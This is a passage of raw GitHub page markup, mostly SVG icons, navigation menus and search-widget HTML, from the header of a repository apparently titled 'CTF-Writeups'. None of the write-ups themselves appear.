4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> Explore All features Documentation <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> GitHub Skills <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Blog <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For Enterprise Teams Startups Education <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> By Solution CI/CD & Automation DevOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> DevSecOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Case Studies Customer Stories Resources <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> <div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div> <div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div> Repositories Topics Trending Collections </div> Pricing </nav> <div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0"> <div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="481769760" data-scoped-search-url="/not1cyyy/CTF-Writeups/search" data-owner-scoped-search-url="/users/not1cyyy/search" data-unscoped-search-url="/search" data-turbo="false" action="/not1cyyy/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="724xIENK1AKiGB9GvPZ5D3VSNUfH9SD9jIyiRhe91U52iIKrH7GbEHuGfDRJ9PQbXY3i/qbjTu+GPj9alwbVMA==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <span>No suggested jump to results</span> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 